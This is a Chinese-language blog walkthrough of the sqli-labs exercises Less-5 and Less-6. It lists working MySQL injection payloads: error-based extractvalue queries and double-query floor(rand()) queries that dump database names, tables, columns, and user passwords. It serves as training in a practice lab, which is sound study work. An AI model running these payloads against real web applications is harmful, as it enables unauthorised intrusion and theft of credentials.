less-5

1. 基于报错的注入

• 基于报错可以爆出当前数据库名等等
  
  id=2’ and extractvalue(1, concat(0x7c,(select user())));-- #
  
  
  
  ?id=2’ and extractvalue(1, concat(0x7c,(select @@version)));-- #
  
  
  
  ?id=2’ and extractvalue(1, concat(0x7c,(select database())));-- #
  
  
• 爆当前数据库表
  
  ?id=2’ and extractvalue(1, concat(0x7c,(
  
  select group_concat(table_name) from information_schema.tables where table_schema=database()
  
  )));-- #
  
  
• 爆字段
  
  ?id=2’ and extractvalue(1, concat(0x7c,(
  
  select group_concat(column_name) from information_schema.columns where table_name=‘users’
  
  )));-- #
  
  
• 爆数据
  
  ?id=2’ and extractvalue(1, concat(0x7c,(
  
  select group_concat(username) from users
  
  )));-- #
  
  ?id=2’ and extractvalue(1, concat(0x7c,(
  
  select group_concat(password) from users
  
  )));-- #
  
  
  
  
• 这种方式爆出数据较少,可能爆不出想要的数据

1. 双查询注入
   
   原理:https://www.2cto.com/article/201303/192718.html

?id=2’ union select 1,count(*), concat((

select password from users limit 2,1

), floor(rand()*2))as a from information_schema.tables group by a;

– #

修改limit

可以一条一条的爆出信息

• 上面基于xpath报错的函数也可以一条一条爆出信息
  
  ?id=2’ and extractvalue(1, concat(0x7c,(
  
  select password from users limit 1,1
  
  )));-- #

less-6

同上 " 闭合

最新文章

1. 新手入门Underscore.js 中文（template）
2. UILabel 的一个蛋疼问题
3. gradle各版本下载地址
4. Centos 6.5 安装 ionCube PHP Loader
5. 申请Google API Key
6. WinForm 窗体属性
7. surge for mac出测试版本了
8. 20145215《Java程序设计》第6周学习总结
9. shell学习记录002-知识点储备
10. Ubuntu Server如何配置SFTP
11. JLINK固件丢失或升级固件后提示Clone的解决办法
12. 用Windows Live Writer发来
13. 远程连接MySql连不上1130
14. Spring Security 入门详解(转)
15. jQuery插件——ajax
16. xBIM 应用与学习 （一）
17. AM335x关于LCD屏幕的时钟PLL配置
18. 【转】asp.net基础-HttpModule
19. centos6.7 配置Elasticsearch
20. C# 控制CH341进行SPI,I2C读写

热门文章

1. Eclipse无法查看第三方jar包源代码解决
2. 白嫖Office365
3. 读者来信 | 如果你家HBase集群Region太多请点进来看看，这个问题你可能会遇到
4. std::bind接口与实现
5. [noip模拟]B<构造>
6. Java并发基础07. ThreadLocal类以及应用技巧
7. HDU1398：Square Coins（DP水题）
8. python3的subprocess的各个方法的区别（二）
9. Linux学习，账号管理与权限管理
10. node+mysql数据库连接（入门）